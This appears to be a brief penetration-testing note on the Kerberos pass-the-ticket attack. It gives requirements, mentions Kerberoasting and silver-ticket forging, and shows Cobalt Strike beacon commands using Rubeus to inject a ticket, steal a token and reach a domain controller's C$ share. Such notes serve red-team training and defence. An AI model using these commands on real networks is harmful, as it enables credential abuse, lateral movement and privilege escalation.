The pass-the-ticket attack uses an intercepted or dumped Kerberos service ticket to authenticate against a service.

Requirements

  • Admin privileges/credentials
    • Dumping a service ticket does not require admin privilege. However, dumping a TGT does.
  • Connection to SMB Admin$ share

The attacker can reuse the ticket elsewhere if possible, or crack the password (Kerberoasting) and use kerberos::golden to create a silver ticket for lateral movement & privilege escalation on the remote machine.

Example

Example with Cobalt Strike beacon & Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
beacon> steal_token $pid # process must be under the target (i.e. ticket's) username
beacon> ls \\DC1\c$ # do stuff with ticket/token